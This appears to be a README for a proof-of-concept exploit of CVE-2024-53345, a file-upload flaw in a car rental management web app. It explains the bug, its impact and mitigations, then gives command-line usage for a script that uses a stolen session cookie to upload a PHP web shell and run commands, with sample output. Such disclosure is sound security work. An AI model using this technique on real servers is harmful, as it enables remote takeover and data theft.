# CVE-2024-53345
Critical 0 Day in Car Rental Management System Versions 1.0 - 1.3

# Description:
A critical vulnerability exists in the System Settings module's file upload functionality within the Car Rental Management System (versions 1.0 to 1.3), allowing low-privileged users to upload arbitrary files, including executable PHP scripts. This vulnerability arises from inadequate file type validation and improper access control on the uploads directory, enabling attackers to upload malicious files and access them publicly without authentication.

By exploiting this flaw, an attacker can upload a PHP shell and later execute commands remotely by appending ?cmd=<command> to the URL of the uploaded file. This enables remote code execution (RCE), potentially leading to a complete server compromise. Exploitation could result in unauthorized access to sensitive data, privilege escalation, and the ability to pivot within the network for further attacks.

# Prerequisites:
Default Configuration: Requires a low-privileged user account to access the upload functionality in the System Settings module.

Site-Specific Configuration: In some setups, the file upload functionality may be exposed publicly, allowing attackers to exploit this vulnerability without requiring a user account.

# Impact:
This vulnerability is critical as it allows remote code execution, potentially resulting in:

Full server compromise.
Unauthorized data access.
Privilege escalation.
Lateral movement within the network.

# Recommendations:
To mitigate this vulnerability:

Implement strict file type validation to prevent uploading executable files such as .php.
Restrict file upload permissions to trusted users only.
Ensure uploaded files are stored in a non-web-accessible directory.
Configure server permissions to block execution of uploaded files by default.
Regularly patch and update your system to address known vulnerabilities.


# Script Usage
python CVE-2024-53345.py -u "URL" -c "COOKIE" -cmd "COMMAND"


python3 CVE-2024-53345.py -u "URL" -c "COOKIE" -cmd "COMMAND"

# Command-Line Arguments
-u or --url:
Specify the base URL of the Car Rental Management System.

-c or --cookie:
Provide the PHP session ID (PHPSESSID) of a low-privileged user to authenticate the upload request.
Example: 3952gmkk9uqf1csqgcmqo58qc0

-cmd or --command:
Specify the command you want to execute on the server after the shell is uploaded.
Example: hostname

# Output
[+] Attempting to upload shell...

[+] Shell uploaded successfully. Check the /car_rental/admin/assets/uploads/ directory.

[+] Found uploaded PHP files: ['1730189880_php.php']

[+] Executing command 'whoami' on the uploaded shell...

[+] Command Output:

Desktop-Demo\User
